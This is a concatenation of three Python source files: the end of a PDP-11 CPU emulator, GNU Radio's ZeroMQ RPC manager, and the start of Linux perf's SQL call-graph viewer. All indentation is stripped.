self.R[v & 7] -= l
addr = self.R[v & 7]
elif bits == 0o60:
addr = self.fetch16()
addr += self.R[v & 7]
addr &= 0xFFFF
if v & 0o10:
addr = self.read16(addr)
return addr
def memread(self, a, l):
if a < 0:
if l == 2:
return self.R[-(a + 1)]
else:
return self.R[-(a + 1)] & 0xFF
if l == 2:
return self.read16(a)
return self.read8(a)
def memwrite(self, a, l, v):
if a < 0:
if l == 2:
self.R[-(a + 1)] = v
else:
self.R[-(a + 1)] &= 0xFF00
self.R[-(a + 1)] |= v
elif l == 2:
self.write16(a, v)
else:
self.write8(a, v)
def branch(self, o):
if o & 0x80:
o = -(((~o)+1)&0xFF)
o <<= 1
self.R[7] += o
def extract_image(self):
# Called on PyPDP11 interrupt
self.rk.save_image(EXTRACTED_IMAGE_FILENAME)
self.writedebug('Disk image saved to: {}\n'.format(EXTRACTED_IMAGE_FILENAME))
def load_image(self):
# Called on PyPDP11 interrupt
self.rk.load_image(EXTRACTED_IMAGE_FILENAME)
self.writedebug('Disk image loaded from file: {}\n'.format(EXTRACTED_IMAGE_FILENAME))
def sync(self):
# Called on PyPDP11 interrupt
unix_dir, local_dir = self.unix_dir, self.local_dir
print('Syncing:', unix_dir, local_dir)
try:
self.rk.start_sync_thread(unix_dir, local_dir)
except Exception as e:
self.writedebug('FAILED TO SYNC: '+str(e)+'\n')
def step(self):
#var val, val1, val2, ia, da, sa, d, s, l, r, o, max, maxp, msb;
self.iter_cnt += 1
self.step_cnt += 1
self.curPC = self.R[7]
ia = self.decode(self.R[7], False, self.curuser) # instruction address
self.R[7] += 2
self.instr = self.physread16(ia)
d = self.instr & 0o77
s = (self.instr & 0o7700) >> 6
l = 2 - (self.instr >> 15)
o = self.instr & 0xFF
if l == 2:
max = 0xFFFF
maxp = 0x7FFF
msb = 0x8000
else:
max = 0xFF
maxp = 0x7F
msb = 0x80
# MOV / CMP / BIT / BIC / BIS
bits = self.instr & 0o070000
if bits == 0o010000: # MOV
sa = self.aget(s, l); val = self.memread(sa, l)
da = self.aget(d, l)
self.PS &= 0xFFF1
if val & msb:
self.PS |= PDP11.FLAGN
if val == 0:
self.PS |= PDP11.FLAGZ
if da < 0 and l == 1:
l = 2
if val & msb:
val |= 0xFF00
self.memwrite(da, l, val)
return
elif bits == 0o020000: # CMP
sa = self.aget(s, l); val1 = self.memread(sa, l)
da = self.aget(d, l); val2 = self.memread(da, l)
val = (val1 - val2) & max
self.PS &= 0xFFF0
if val == 0:
self.PS |= PDP11.FLAGZ
if val & msb:
self.PS |= PDP11.FLAGN
if ((val1 ^ val2) & msb) and not ((val2 ^ val) & msb):
self.PS |= PDP11.FLAGV
if val1 < val2:
self.PS |= PDP11.FLAGC
return
elif bits == 0o030000: # BIT
sa = self.aget(s, l); val1 = self.memread(sa, l)
da = self.aget(d, l); val2 = self.memread(da, l)
val = val1 & val2
self.PS &= 0xFFF1
if val == 0:
self.PS |= PDP11.FLAGZ
if val & msb:
self.PS |= PDP11.FLAGN
return
elif bits == 0o040000: # BIC
sa = self.aget(s, l); val1 = self.memread(sa, l)
da = self.aget(d, l); val2 = self.memread(da, l)
val = (max ^ val1) & val2
self.PS &= 0xFFF1
if val == 0:
self.PS |= PDP11.FLAGZ
if val & msb:
self.PS |= PDP11.FLAGN
self.memwrite(da, l, val)
return
elif bits == 0o050000: # BIS
sa = self.aget(s, l); val1 = self.memread(sa, l)
da = self.aget(d, l); val2 = self.memread(da, l)
val = val1 | val2
self.PS &= 0xFFF1
if val == 0:
self.PS |= PDP11.FLAGZ
if val & msb:
self.PS |= PDP11.FLAGN
self.memwrite(da, l, val)
return
# ADD / SUB
bits = self.instr & 0o170000
if bits == 0o060000: # ADD
sa = self.aget(s, 2); val1 = self.memread(sa, 2)
da = self.aget(d, 2); val2 = self.memread(da, 2)
val = (val1 + val2) & 0xFFFF
self.PS &= 0xFFF0
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0x8000:
self.PS |= PDP11.FLAGN
if not ((val1 ^ val2) & 0x8000) and ((val2 ^ val) & 0x8000):
self.PS |= PDP11.FLAGV
if val1 + val2 >= 0xFFFF:
self.PS |= PDP11.FLAGC
self.memwrite(da, 2, val)
return
elif bits == 0o160000: # SUB
sa = self.aget(s, 2); val1 = self.memread(sa, 2)
da = self.aget(d, 2); val2 = self.memread(da, 2)
val = (val2 - val1) & 0xFFFF
self.PS &= 0xFFF0
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0x8000:
self.PS |= PDP11.FLAGN
if ((val1 ^ val2) & 0x8000) and not ((val2 ^ val) & 0x8000):
self.PS |= PDP11.FLAGV
if val1 > val2:
self.PS |= PDP11.FLAGC
self.memwrite(da, 2, val)
return
# JSR / MUL / DIV / ASH / ASHC / XOR / SOB
bits = self.instr & 0o177000
if bits == 0o004000: # JSR
val = self.aget(d, l)
if val >= 0:
self.push(self.R[s & 7])
self.R[s & 7] = self.R[7]
self.R[7] = val
return
elif bits == 0o070000: # MUL
val1 = self.R[s & 7]
if val1 & 0x8000:
val1 = -((0xFFFF^val1)+1)
da = self.aget(d, l); val2 = self.memread(da, 2)
if val2 & 0x8000:
val2 = -((0xFFFF^val2)+1)
val = val1 * val2
self.R[s & 7] = (val & 0xFFFF0000) >> 16
self.R[(s & 7)|1] = val & 0xFFFF
self.PS &= 0xFFF0
if val & 0x80000000:
self.PS |= PDP11.FLAGN
if (val & 0xFFFFFFFF) == 0:
self.PS |= PDP11.FLAGZ
if val < (1<<15) or val >= ((1<<15)-1):
self.PS |= PDP11.FLAGC
return
elif bits == 0o071000: # DIV
val1 = (self.R[s & 7] << 16) | self.R[(s & 7) | 1]
da = self.aget(d, l); val2 = self.memread(da, 2)
self.PS &= 0xFFF0
if val2 == 0:
self.PS |= PDP11.FLAGC
return
if (val1 / val2) >= 0x10000:
self.PS |= PDP11.FLAGV
return
self.R[s & 7] = (val1 // val2) & 0xFFFF
self.R[(s & 7) | 1] = (val1 % val2) & 0xFFFF
if self.R[s & 7] == 0:
self.PS |= PDP11.FLAGZ
if self.R[s & 7] & 0o100000:
self.PS |= PDP11.FLAGN
if val1 == 0:
self.PS |= PDP11.FLAGV
return
elif bits == 0o072000: # ASH
val1 = self.R[s & 7]
da = self.aget(d, 2); val2 = self.memread(da, 2) & 0o77
self.PS &= 0xFFF0
if val2 & 0o40:
val2 = (0o77 ^ val2) + 1
if val1 & 0o100000:
val = 0xFFFF ^ (0xFFFF >> val2)
val |= val1 >> val2
else:
val = val1 >> val2
if val1 & (1 << (val2 - 1)):
self.PS |= PDP11.FLAGC
else:
val = (val1 << val2) & 0xFFFF
if val1 & (1 << (16 - val2)):
self.PS |= PDP11.FLAGC
self.R[s & 7] = val
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0o100000:
self.PS |= PDP11.FLAGN
if self._xor(val & 0o100000, val1 & 0o100000):
self.PS |= PDP11.FLAGV
return
elif bits == 0o073000: # ASHC
val1 = (self.R[s & 7] << 16) | self.R[(s & 7) | 1]
da = self.aget(d, 2); val2 = self.memread(da, 2) & 0o77
self.PS &= 0xFFF0
if val2 & 0o40:
val2 = (0o77 ^ val2) + 1
if val1 & 0x80000000:
val = 0xFFFFFFFF ^ (0xFFFFFFFF >> val2)
val |= val1 >> val2
else:
val = val1 >> val2
if val1 & (1 << (val2 - 1)):
self.PS |= PDP11.FLAGC
else:
val = (val1 << val2) & 0xFFFFFFFF
if val1 & (1 << (32 - val2)):
self.PS |= PDP11.FLAGC
self.R[s & 7] = (val >> 16) & 0xFFFF
self.R[(s & 7)|1] = val & 0xFFFF
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0x80000000:
self.PS |= PDP11.FLAGN
if self._xor(val & 0x80000000, val1 & 0x80000000):
self.PS |= PDP11.FLAGV
return
elif bits == 0o074000: # XOR
val1 = self.R[s & 7]
da = self.aget(d, 2); val2 = self.memread(da, 2)
val = val1 ^ val2
self.PS &= 0xFFF1
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0x8000:
self.PS |= PDP11.FLAGZ
self.memwrite(da, 2, val)
return
elif bits == 0o077000: # SOB
self.R[s & 7] -= 1
if self.R[s & 7]:
o &= 0o77
o <<= 1
self.R[7] -= o
return
# CLR / COM / INC / DEC / NEG / ADC / SBC / TST / ROL / ROR / ASL / AST / SXT
bits = self.instr & 0o077700
if bits == 0o005000: # CLR
self.PS &= 0xFFF0
self.PS |= PDP11.FLAGZ
da = self.aget(d, l)
self.memwrite(da, l, 0)
return
elif bits == 0o005100: # COM
da = self.aget(d, l)
val = self.memread(da, l) ^ max
self.PS &= 0xFFF0; self.PS |= PDP11.FLAGC
if val & msb:
self.PS |= PDP11.FLAGN
if val == 0:
self.PS |= PDP11.FLAGZ
self.memwrite(da, l, val)
return
elif bits == 0o005200: # INC
da = self.aget(d, l)
val = (self.memread(da, l) + 1) & max
self.PS &= 0xFFF1
if val & msb:
self.PS |= PDP11.FLAGN | PDP11.FLAGV
if val == 0:
self.PS |= PDP11.FLAGZ
self.memwrite(da, l, val)
return
elif bits == 0o005300: # DEC
da = self.aget(d, l)
val = (self.memread(da, l) - 1) & max
self.PS &= 0xFFF1
if val & msb:
self.PS |= PDP11.FLAGN
if val == maxp:
self.PS |= PDP11.FLAGV
if val == 0:
self.PS |= PDP11.FLAGZ
self.memwrite(da, l, val)
return
elif bits == 0o005400: # NEG
da = self.aget(d, l)
val = (-self.memread(da, l)) & max
self.PS &= 0xFFF0
if val & msb:
self.PS |= PDP11.FLAGN
if val == 0:
self.PS |= PDP11.FLAGZ
else:
self.PS |= PDP11.FLAGC
if val == 0x8000:
self.PS |= PDP11.FLAGV
self.memwrite(da, l, val)
return
elif bits == 0o005500: # ADC
da = self.aget(d, l)
val = self.memread(da, l)
if self.PS & PDP11.FLAGC:
self.PS &= 0xFFF0
if (val + 1) & msb:
self.PS |= PDP11.FLAGN
if val == max:
self.PS |= PDP11.FLAGZ
if val == 0o077777:
self.PS |= PDP11.FLAGV
if val == 0o177777:
self.PS |= PDP11.FLAGC
self.memwrite(da, l, (val+1) & max)
else:
self.PS &= 0xFFF0
if val & msb:
self.PS |= PDP11.FLAGN
if val == 0:
self.PS |= PDP11.FLAGZ
return
elif bits == 0o005600: # SBC
da = self.aget(d, l)
val = self.memread(da, l)
if self.PS & PDP11.FLAGC:
self.PS &= 0xFFF0
if (val - 1) & msb:
self.PS |= PDP11.FLAGN
if val == 1:
self.PS |= PDP11.FLAGZ
if val:
self.PS |= PDP11.FLAGC
if val == 0o100000:
self.PS |= PDP11.FLAGV
self.memwrite(da, l, (val-1) & max)
else:
self.PS &= 0xFFF0
if val & msb:
self.PS |= PDP11.FLAGN
if val == 0:
self.PS |= PDP11.FLAGZ
if val == 0o100000:
self.PS |= PDP11.FLAGV
self.PS |= PDP11.FLAGC
return
elif bits == 0o005700: # TST
da = self.aget(d, l)
val = self.memread(da, l)
self.PS &= 0xFFF0
if val & msb:
self.PS |= PDP11.FLAGN
if val == 0:
self.PS |= PDP11.FLAGZ
return
elif bits == 0o006000: # ROR
da = self.aget(d, l)
val = self.memread(da, l)
if self.PS & PDP11.FLAGC:
val |= max+1
self.PS &= 0xFFF0
if val & 1:
self.PS |= PDP11.FLAGC
if val & (max+1):
self.PS |= PDP11.FLAGN
if not (val & max):
self.PS |= PDP11.FLAGZ
if self._xor(val & 1, val & (max+1)):
self.PS |= PDP11.FLAGV
val >>= 1
self.memwrite(da, l, val)
return
elif bits == 0o006100: # ROL
da = self.aget(d, l)
val = self.memread(da, l) << 1
if self.PS & PDP11.FLAGC:
val |= 1
self.PS &= 0xFFF0
if val & (max+1):
self.PS |= PDP11.FLAGC
if val & msb:
self.PS |= PDP11.FLAGN
if not (val & max):
self.PS |= PDP11.FLAGZ
if (val ^ (val >> 1)) & msb:
self.PS |= PDP11.FLAGV
val &= max
self.memwrite(da, l, val)
return
elif bits == 0o006200: # ASR
da = self.aget(d, l)
val = self.memread(da, l)
self.PS &= 0xFFF0
if val & 1:
self.PS |= PDP11.FLAGC
if val & msb:
self.PS |= PDP11.FLAGN
if self._xor(val & msb, val & 1):
self.PS |= PDP11.FLAGV
val = (val & msb) | (val >> 1)
if val == 0:
self.PS |= PDP11.FLAGZ
self.memwrite(da, l, val)
return
elif bits == 0o006300: # ASL
da = self.aget(d, l)
val = self.memread(da, l)
self.PS &= 0xFFF0
if val & msb:
self.PS |= PDP11.FLAGC
if val & (msb >> 1):
self.PS |= PDP11.FLAGN
if (val ^ (val << 1)) & msb:
self.PS |= PDP11.FLAGV
val = (val << 1) & max
if val == 0:
self.PS |= PDP11.FLAGZ
self.memwrite(da, l, val)
return
elif bits == 0o006700: # SXT
da = self.aget(d, l)
if self.PS & PDP11.FLAGN:
self.memwrite(da, l, max)
else:
self.PS |= PDP11.FLAGZ
self.memwrite(da, l, 0)
return
# JMP / SWAB / MARK / MFPI / MTPI
bits = self.instr & 0o177700
if bits == 0o000100: # JMP
val = self.aget(d, 2)
if val >= 0:
self.R[7] = val
return
elif bits == 0o000300: # SWAB
da = self.aget(d, l)
val = self.memread(da, l)
val = ((val >> 8) | (val << 8)) & 0xFFFF
self.PS &= 0xFFF0
if (val & 0xFF) == 0:
self.PS |= PDP11.FLAGZ
if val & 0x80:
self.PS |= PDP11.FLAGN
self.memwrite(da, l, val)
return
elif bits == 0o006400: # MARK
self.R[6] = self.R[7] + (self.instr & 0o77) << 1
self.R[7] = self.R[5]
self.R[5] = self.pop()
# TODO: no return here?
elif bits == 0o006500: # MFPI
da = self.aget(d, 2)
if da == -7:
val = self.R[6] if (self.curuser == self.prevuser) else (self.USP if self.prevuser else self.KSP)
elif da < 0:
self.panic("invalid MFPI instruction")
else:
val = self.physread16(self.decode(da, False, self.prevuser))
self.push(val)
self.PS &= 0xFFF0; self.PS |= PDP11.FLAGC
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0x8000:
self.PS |= PDP11.FLAGN
return
elif bits == 0o006600: # MTPI
da = self.aget(d, 2)
val = self.pop()
if da == -7:
if self.curuser == self.prevuser:
self.R[6] = val
elif self.prevuser:
self.USP = val
else:
self.KSP = val
elif da < 0:
self.panic("invalid MTPI instrution")
else:
sa = self.decode(da, True, self.prevuser)
self.physwrite16(sa, val)
self.PS &= 0xFFF0; self.PS |= PDP11.FLAGC
if val == 0:
self.PS |= PDP11.FLAGZ
if val & 0x8000:
self.PS |= PDP11.FLAGN
return
# RTS
if (self.instr & 0o177770) == 0o000200:
self.R[7] = self.R[d & 7]
self.R[d & 7] = self.pop()
return
# TODO: what are these?
bits = self.instr & 0o177400
if bits == 0o000400:
self.branch(o)
return
elif bits == 0o001000:
if not (self.PS & PDP11.FLAGZ):
self.branch(o)
return
elif bits == 0o001400:
if self.PS & PDP11.FLAGZ:
self.branch(o)
return
elif bits == 0o002000:
if not self._xor(self.PS & PDP11.FLAGN, self.PS & PDP11.FLAGV):
self.branch(o)
return
elif bits == 0o002400:
if self._xor(self.PS & PDP11.FLAGN, self.PS & PDP11.FLAGV):
self.branch(o)
return
elif bits == 0o003000:
if not self._xor(self.PS & PDP11.FLAGN, self.PS & PDP11.FLAGV) and not (self.PS & PDP11.FLAGZ):
self.branch(o)
return
elif bits == 0o003400:
if self._xor(self.PS & PDP11.FLAGN, self.PS & PDP11.FLAGV) or (self.PS & PDP11.FLAGZ):
self.branch(o)
return
elif bits == 0o100000:
if not (self.PS & PDP11.FLAGN):
self.branch(o)
return
elif bits == 0o100400:
if self.PS & PDP11.FLAGN:
self.branch(o)
return
elif bits == 0o101000:
if not (self.PS & PDP11.FLAGC) and not (self.PS & PDP11.FLAGZ):
self.branch(o)
return
elif bits == 0o101400:
if (self.PS & PDP11.FLAGC) or (self.PS & PDP11.FLAGZ):
self.branch(o)
return
elif bits == 0o102000:
if not (self.PS & PDP11.FLAGV):
self.branch(o)
return
elif bits == 0o102400:
if self.PS & PDP11.FLAGV:
self.branch(o)
return
elif bits == 0o103000:
if not (self.PS & PDP11.FLAGC):
self.branch(o)
return
elif bits == 0o103400:
if self.PS & PDP11.FLAGC:
self.branch(o)
return
# EMT TRAP IOT BPT
if (self.instr & 0o177000) == 0o104000 or self.instr == 3 or self.instr == 4:
#var vec, prev;
if (self.instr & 0o177400) == 0o104000:
vec = 0o30
elif (self.instr & 0o177400) == 0o104400:
vec = 0o34
elif self.instr == 3:
vec = 0o14
else:
vec = 0o20
prev = self.PS
self.switchmode(False)
self.push(prev)
self.push(self.R[7])
self.R[7] = self.memory[vec>>1]
self.PS = self.memory[(vec>>1)+1]
if self.prevuser:
self.PS |= (1<<13) | (1<<12)
return
# CL?, SE?
if (self.instr & 0o177740) == 0o240:
if self.instr & 0o20:
self.PS |= self.instr & 0o17
else:
self.PS &= ~(self.instr & 0o17)
return
# HALT / WAIT / RTI / RTT / RESET / SETD
bits = self.instr
if bits == 0o000000: # HALT
if not self.curuser:
self.writedebug("HALT\n")
self.printstate()
self.stop_cpu()
return
elif bits == 0o000001: # WAIT
#time.sleep(0.001)
if not self.curuser:
self.running.clear()
return
elif bits == 0o000002 or bits == 0o000006: # RTI / RTT
self.R[7] = self.pop()
val = self.pop()
if self.curuser:
val &= 0o47
val |= self.PS & 0o177730
self.physwrite16(0o777776, val)
return
elif bits == 0o000005: # RESET
if self.curuser:
return
self.terminal.clear()
self.rk.reset()
return
elif bits == 0o170011: # SETD ; not needed by UNIX, but used; therefore ignored
return
raise(Trap(INT.INVAL, "invalid instruction: " + self.disasm(ia)))
def run(self):
interrupted_from_wait = False
while not self.cpu_stop.is_set():
try:
self.step()
if not self.running.is_set() and self.clock_running:
self.running.wait()
interrupted_from_wait = True
# Handle interrupts
if (interrupted_from_wait or (self.step_cnt & 0xF) == 0) and not self.interrupts.empty():
priority_level = ((self.PS >> 5) & 7)
if self.last_interrupt_priority > priority_level:
inter = self.interrupts.get()
# this is fixed according to Wikipedia description from >= to >
if inter.pri > priority_level:
self.handleinterrupt(inter.vec)
self.last_interrupt_priority = INT.MAX_PRIORITY
else:
# remember this "unprocessed" interrupt's priority for minor optimization
self.last_interrupt_priority = inter.pri
self.interrupts.put(inter)
interrupted_from_wait = False
except Trap as e:
self.trapat(e.num, str(e))
if self.prdebug:
self.printstate()
time.sleep(1)
print('- CPU stopped')
def start_cpu(self):
self.cpu_stop = threading.Event()
self.cpu_thread = threading.Thread(target=self.run)
self.cpu_thread.daemon = True
self.cpu_thread.start()
self.clock_stop = threading.Event()
self.clock_thread = threading.Thread(target=self.clock)
self.clock_thread.daemon = True
self.clock_thread.start()
def stop_cpu(self):
print('Stopping CPU...')
self.clock_stop.set()
print('Stopping clock...')
self.cpu_stop.set()
if __name__=='__main__':
pdp11 = PDP11()
pdp11.start_cpu()
pdp11.terminal.mainloop()
|
rpc_manager.py
|
#
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import zmq
import pmt
import threading
class rpc_manager():
def __init__(self):
self.zmq_context = zmq.Context()
self.poller_rep = zmq.Poller()
self.poller_req_out = zmq.Poller()
self.poller_req_in = zmq.Poller()
self.interfaces = dict()
def __del__(self):
self.stop_watcher()
self.watcher_thread.join()
def set_reply_socket(self, address):
self.rep_socket = self.zmq_context.socket(zmq.REP)
self.rep_socket.bind(address)
print "[RPC] reply socket bound to: ", address
self.poller_rep.register(self.rep_socket, zmq.POLLIN)
def set_request_socket(self, address):
self.req_socket = self.zmq_context.socket(zmq.REQ)
self.req_socket.connect(address)
print "[RPC] request socket connected to: ", address
self.poller_req_out.register(self.req_socket, zmq.POLLOUT)
self.poller_req_in.register(self.req_socket, zmq.POLLIN)
def add_interface(self, id_str, callback_func):
if not self.interfaces.has_key(id_str):
self.interfaces[id_str] = callback_func
print "[RPC] added reply interface:", id_str
else:
print "[RPC] ERROR: duplicate id_str:", id_str
def watcher(self):
self.keep_running = True
while self.keep_running:
# poll for calls
socks = dict(self.poller_rep.poll(10))
if socks.get(self.rep_socket) == zmq.POLLIN:
# receive call
msg = self.rep_socket.recv()
(id_str, args) = pmt.to_python(pmt.deserialize_str(msg))
print "[RPC] request:", id_str, ", args:", args
reply = self.callback(id_str, args)
self.rep_socket.send(pmt.serialize_str(pmt.to_pmt(reply)))
def start_watcher(self):
self.watcher_thread = threading.Thread(target=self.watcher,args=())
self.watcher_thread.daemon = True
self.watcher_thread.start()
def stop_watcher(self):
self.keep_running = False
self.watcher_thread.join()
def request(self, id_str, args=None):
socks = dict(self.poller_req_out.poll(10))
if socks.get(self.req_socket) == zmq.POLLOUT:
self.req_socket.send(pmt.serialize_str(pmt.to_pmt((id_str,args))))
socks = dict(self.poller_req_in.poll(10))
if socks.get(self.req_socket) == zmq.POLLIN:
reply = pmt.to_python(pmt.deserialize_str(self.req_socket.recv()))
print "[RPC] reply:", reply
return reply
def callback(self, id_str, args):
if self.interfaces.has_key(id_str):
callback_func = self.interfaces.get(id_str)
if not args == None:
# use unpacking or splat operator * to unpack argument list
return(callback_func(*args))
else:
return(callback_func())
else:
print "[RPC] ERROR: id_str not found:", id_str
return None
|
exported-sql-viewer.py
|
#!/usr/bin/env python
# SPDX-License-Identifier: GPL-2.0
# exported-sql-viewer.py: view data from sql database
# Copyright (c) 2014-2018, Intel Corporation.
# To use this script you will need to have exported data using either the
# export-to-sqlite.py or the export-to-postgresql.py script. Refer to those
# scripts for details.
#
# Following on from the example in the export scripts, a
# call-graph can be displayed for the pt_example database like this:
#
# python tools/perf/scripts/python/exported-sql-viewer.py pt_example
#
# Note that for PostgreSQL, this script supports connecting to remote databases
# by setting hostname, port, username, password, and dbname e.g.
#
# python tools/perf/scripts/python/exported-sql-viewer.py "hostname=myhost username=myuser password=mypassword dbname=pt_example"
#
# The result is a GUI window with a tree representing a context-sensitive
# call-graph. Expanding a couple of levels of the tree and adjusting column
# widths to suit will display something like:
#
# Call Graph: pt_example
# Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
# v- ls
# v- 2638:2638
# v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
# |- unknown unknown 1 13198 0.1 1 0.0
# >- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
# >- _d_linit_internal ld-2.19.so 1 448152 4.4 11094 5.3
# v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
# >- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
# >- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
# >- __libc_csu_init ls 1 10354 0.1 10 0.0
# |- _setjmp libc-2.19.so 1 0 0.0 4 0.0
# v- main ls 1 8182043 99.6 180254 99.9
#
# Points to note:
# The top level is a command name (comm)
# The next level is a thread (pid:tid)
# Subsequent levels are functions
# 'Count' is the number of calls
# 'Time' is the elapsed time until the function returns
# Percentages are relative to the level above
# 'Branch Count' is the total number of branches for that function and all
# functions that it calls
# There is also a "All branches" report, which displays branches and
# possibly disassembly. However, presently, the only supported disassembler is
# Intel XED, and additionally the object code must be present in perf build ID
# cache. To use Intel XED, libxed.so must be present. To build and install
# libxed.so:
# git clone https://github.com/intelxed/mbuild.git mbuild
# git clone https://github.com/intelxed/xed
# cd xed
# ./mfile.py --share
# sudo ./mfile.py --prefix=/usr/local install
# sudo ldconfig
#
# Example report:
#
# Time CPU Command PID TID Branch Type In Tx Branch
# 8107675239590 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 8107675239899 2 ls 22011 22011 hardware interrupt No 7fab593ea260 _start (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675241900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 7fab593ea263 e8 c8 06 00 00 callq 0x7fab593ea930
# 8107675241900 2 ls 22011 22011 call No 7fab593ea263 _start+0x3 (ld-2.19.so) -> 7fab593ea930 _dl_start (ld-2.19.so)
# 7fab593ea930 55 pushq %rbp
# 7fab593ea931 48 89 e5 mov %rsp, %rbp
# 7fab593ea934 41 57 pushq %r15
# 7fab593ea936 41 56 pushq %r14
# 7fab593ea938 41 55 pushq %r13
# 7fab593ea93a 41 54 pushq %r12
# 7fab593ea93c 53 pushq %rbx
# 7fab593ea93d 48 89 fb mov %rdi, %rbx
# 7fab593ea940 48 83 ec 68 sub $0x68, %rsp
# 7fab593ea944 0f 31 rdtsc
# 7fab593ea946 48 c1 e2 20 shl $0x20, %rdx
# 7fab593ea94a 89 c0 mov %eax, %eax
# 7fab593ea94c 48 09 c2 or %rax, %rdx
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 8107675242232 2 ls 22011 22011 hardware interrupt No 7fab593ea94f _dl_start+0x1f (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675242900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea94f _dl_start+0x1f (ld-2.19.so)
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 7fab593ea956 48 89 15 3b 13 22 00 movq %rdx, 0x22133b(%rip)
# 8107675243232 2 ls 22011 22011 hardware interrupt No 7fab593ea956 _dl_start+0x26 (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
from __future__ import print_function
import sys
# Only change warnings if the python -W option was not used
if not sys.warnoptions:
import warnings
# PySide2 causes deprecation warnings, ignore them.
warnings.filterwarnings("ignore", category=DeprecationWarning)
import argparse
import weakref
import threading
import string
try:
# Python2
import cPickle as pickle
# size of pickled integer big enough for record size
glb_nsz = 8
except ImportError:
import pickle
glb_nsz = 16
import re
import os
import random
import copy
import math
pyside_version_1 = True
if not "--pyside-version-1" in sys.argv:
try:
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtSql import *
from PySide2.QtWidgets import *
pyside_version_1 = False
except:
pass
if pyside_version_1:
from PySide.QtCore import *
from PySide.QtGui import *
from PySide.QtSql import *
from decimal import Decimal, ROUND_HALF_UP
from ctypes import CDLL, Structure, create_string_buffer, addressof, sizeof, \
c_void_p, c_bool, c_byte, c_char, c_int, c_uint, c_longlong, c_ulonglong
from multiprocessing import Process, Array, Value, Event
# xrange is range in Python3
try:
xrange
except NameError:
xrange = range
def printerr(*args, **keyword_args):
print(*args, file=sys.stderr, **keyword_args)
# Data formatting helpers
def tohex(ip):
if ip < 0:
ip += 1 << 64
return "%x" % ip
def offstr(offset):
if offset:
return "+0x%x" % offset
return ""
def dsoname(name):
if name == "[kernel.kallsyms]":
return "[kernel]"
return name
def findnth(s, sub, n, offs=0):
pos = s.find(sub)
if pos < 0:
return pos
if n <= 1:
return offs + pos
return findnth(s[pos + 1:], sub, n - 1, offs + pos + 1)
# Percent to one decimal place
def PercentToOneDP(n, d):
if not d:
return "0.0"
x = (n * Decimal(100)) / d
return str(x.quantize(Decimal(".1"), rounding=ROUND_HALF_UP))
# Helper for queries that must not fail
def QueryExec(query, stmt):
ret = query.exec_(stmt)
if not ret:
raise Exception("Query failed: " + query.lastError().text())
# Background thread
class Thread(QThread):
done = Signal(object)
def __init__(self, task, param=None, parent=None):
super(Thread, self).__init__(parent)
self.task = task
self.param = param
def run(self):
while True:
if self.param is None:
done, result = self.task()
else:
done, result = self.task(self.param)
self.done.emit(result)
if done:
break
# Tree data model
class TreeModel(QAbstractItemModel):
def __init__(self, glb, params, parent=None):
super(TreeModel, self).__init__(parent)
self.glb = glb
self.params = params
self.root = self.GetRoot()
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self.root
def rowCount(self, parent):
result = self.Item(parent).childCount()
if result < 0:
result = 0
self.dataChanged.emit(parent, parent)
return result
def hasChildren(self, parent):
return self.Item(parent).hasChildren()
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def parent(self, child):
child_item = child.internalPointer()
if child_item is self.root:
return QModelIndex()
parent_item = child_item.getParentItem()
return self.createIndex(parent_item.getRow(), 0, parent_item)
def index(self, row, column, parent):
child_item = self.Item(parent).getChildItem(row)
return self.createIndex(row, column, child_item)
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.root.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Table data model
class TableModel(QAbstractTableModel):
def __init__(self, parent=None):
super(TableModel, self).__init__(parent)
self.child_count = 0
self.child_items = []
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self
def rowCount(self, parent):
return self.child_count
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
